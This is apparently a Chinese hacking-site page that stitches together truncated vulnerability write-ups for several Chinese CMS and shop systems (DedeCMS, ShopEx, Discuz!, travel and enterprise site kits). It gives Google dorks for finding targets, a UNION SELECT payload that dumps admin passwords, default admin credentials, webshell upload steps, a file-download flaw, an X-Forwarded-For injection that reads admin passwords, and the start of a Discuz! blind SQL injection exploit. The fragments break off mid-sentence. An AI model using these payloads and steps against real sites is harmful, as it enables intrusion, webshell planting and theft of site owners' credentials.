话说农夫这大黑阔也有须要我帮助的时候,丢了个地址给我,看了下是西部商务的管理体系,同时也丢了套源码给我…    　　Ok,研究了下,发明标题出在哪了…    　　这站用的是SQL通用防注过程序 V3.0,恩,这货色可不好绕,我记切当初我有写过一个文章 通过提交一句话直接拿shell的..独一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 好吧,持续找漏洞    　　不就是防打针么,大家可能会说还有cookie不是… 确切,我也是这么认为的,看了多少个文件 基本上都是request.querystring来获取...

google搜索 inurl:info_Print.asp?ArticleID=   默认后台：website/ad_login.asp   爆管理员密码：   union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin   经过测试，大部分都可以爆出来，解下MD5就一路顺风~

dedecms 5.7教之前的版本有了很大的改进， 修复了5.6以下版本严重的上传0day； 相当的鸡肋，前提是有了后台权限。 由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名， 导致直接写入webshell漏洞。 方法一见：dedecms5.7拿SHELL漏洞即修复 漏洞测试： 1、进入后台，默认的是dede，http://www.soocf.com/dede， 左边导航栏目，选择模块>辅助插件>文件管理器 (系统默认安装的，如果没有请在插件管理器中自行安装)>然后选择新建文本(或者文件上传)…… 如上图：文件名称随便填，例如1.php...

漏洞类型：后台验证 漏洞分析： 看download.asp的源码 <%  Dim path  path=Request.QueryString("file")  If path<>"" Then  On Error Resume Next  path=Server.MapPath(path)  downloadfile(path)  End If  function downloadfile(fullpath)  downloadfile = false  dim strfilename, s, fso, f, intfilelength  set fso = server.createobject("scripting.filesystemobject")  if not fso.fileexists(fullpath) Then  response.write "对不起，该文件不存在"  response.end  exit function  end if  ...

漏洞类型：SQL注入 漏洞分析：千米旅游网站管理系统是最新开发的一套旅游行业网站管理系统，有效的帮助您搭建旅游电子商务网站。系统包含了文章发布模块、酒店模块、机票模块、旅游度假模块、景点模块、图片模块、旅游商城模块、会员模块、预订及订单处理模块、信息采集等功能模块，更加满足您的需求！ 默认后台：admin 默认帐号：admin admin888 漏洞文件：admin目录下, upfile.asp upload_pic.asp upfile_pic.asp data.asp 未作验证文件若干…… 1、上传漏洞 http://www.hackline.net/admin/upfile.as...

漏洞类型：SQL注入 漏洞描述：梦缘设计企业网站管理系统searchpic.asp页面存在搜索型注入。 代码分析：searchpic.asp <!--#include file="top.asp"-->    <%  if session("skins")<>"" then  set rstmp=conn.execute("select skin_pic,id from skins where id="&session("skins")&"")  else  set rstmp=conn.execute("select skin_pic from skins where default=true")  end if  show=rstmp(0)  set rstmp=nothing  call myweb  if instr(show,"$show_userlogin$")>0 then  call showu...

ShopEx网店系统销售平台，是国内最早的网店软件提供商之一；是目前国内网店系统持续研发最久的公司；是目前网店软件国内市场占有率最高的软件提供商；是目前网店软件行业内规模最大的公司。 漏洞描述：crontab.php变量未进行严格过滤，发现linux的对php exit()不会退出，继续往下执行。于是漏洞产生了。 漏洞代码： \core\include_v5\crontab.php zend加密后的，我只发布解密后的代码。 public function run( ) { $this->logFile = HOME_DIR.”/logs/access.log.php”; $this->now = time( ); $this->viewS...

漏洞产生原因： 没有过滤$_SERVER导致用户可以伪造$_SERVER[X-FORWARDED-FOR]，从而将恶意注射语句写入数据库中。 利用步骤： 1. 进入有评论的页面，先评论一个并抓包。 2. 在包中添加一条： X-Forwarded-For: 127.0.0.1(select pwd from stcms_admin where id =1))#并保存 3. NC提交 4. 此时又添加了一条留言，并且多了一个回复，内容就是管理员的密码

<!–p session_start();      include “../include/databaseConfig.inc.php”; $admin = $_POST['admin'];      $pass = md5($_POST['pass']); $codes = $_POST['codes'];      if($_GET['action']){ //这里开始错误！ /* if($result=$d–>Execute(“select * from x_admin where a_admin=’”.$admin.”‘”)){ if($rs=mysql_fetch_object($result)){ if($rs-&gt;a_pws==$pass){ if($codes!=$_SESSION['code']){ unset($_SESSION['code']); echo “<script type=”text/javascript”>...

<!–p<br–>print_r(‘ +—————————————————————————+ Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57 2010.11.05 mail: toby57 at 163 dot com team: http://www.wolvez.org +————————————————&#...